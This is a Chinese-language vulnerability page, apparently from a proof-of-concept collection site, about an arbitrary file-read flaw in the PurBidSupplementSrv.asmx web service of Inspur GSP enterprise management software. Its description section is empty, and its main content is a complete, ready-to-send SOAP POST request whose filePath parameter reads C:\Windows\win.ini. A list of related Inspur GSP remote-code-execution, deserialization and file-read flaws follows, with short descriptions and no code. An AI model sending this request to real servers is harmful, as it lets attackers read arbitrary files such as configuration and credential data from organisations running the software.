浪潮GSP企业管理软件 PurBidsupplementsrv.asmx 文件读取漏洞

漏洞描述

PoC代码

POST /cwbase/service/cepp/PurBidSupplementSrv.asmx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/downLoadFile"
Content-Length: 266

<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body xmlns:m="http://tempuri.org/">
<m:downLoadFile>
<m:filePath>C:\Windows\win.ini</m:filePath>
<m:offset>0</m:offset>
</m:downLoadFile>
</soap:Body>
</soap:Envelope>

相关漏洞推荐

• 浪潮GSP企业管理软件 srbbdefineservice.asmx 远程代码执行漏洞 无POC

  2025-07-07 17:09:03 | 浪潮GSP企业管理软件
  浪潮GSP企业管理软件的 srbbdefineservice.asmx 接口存在远程代码执行漏洞。攻击者可以通过构造特定的SOAP请求在目标系统上执行任意命令，从而获得系统的完全控制权限。

• 浪潮GSP企业管理软件 /cwbase/service/qyzj/AllotOrderSrv.asmx 远程代码执行漏洞 POC

  2025-07-01 19:30:31 | 浪潮GSP企业管理软件
  远程代码执行漏洞是指攻击者通过某些漏洞在服务器上执行任意代码，这通常是由于应用程序对外部输入的验证不足或处理不当造成的。攻击者可以利用这个漏洞上传恶意代码或直接通过HTTP请求发送恶意代码，从而控制服...

• 浪潮GSP企业管理软件 GSP_UnitDefineWebService 反序列化漏洞 POC

  2024-08-09 | 浪潮GSP企业管理软件
  浪潮GSP企业管理软件的 GSP_UnitDefineWebService.asmx 接口存在远程代码执行漏洞。攻击者可以通过构造特定的SOAP请求在目标系统上执行任意命令，从而获得系统的完全控制权限...

• 浪潮GSP企业管理软件 FileMgrSrv.asmx 文件读取漏洞 POC

  2025-07-14 11:25:30 | 浪潮GSP企业 管理 软件
  文件读取漏洞是指攻击者通过某种方式获取对系统文件的读取权限，从而访问敏感信息，如配置文件、源代码、用户数据等。这种漏洞通常是由于应用程序未正确实施权限控制或者未对用户输入进行充分过滤和验证导致的。

• SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

  2025-09-22 00:22:31 | SourceCodester Pet Grooming Management Software
  SourceCodester Pet Grooming Management Software是SourceCodester开源的一个宠物美容管理系统。 SourceCodester Pet Groo...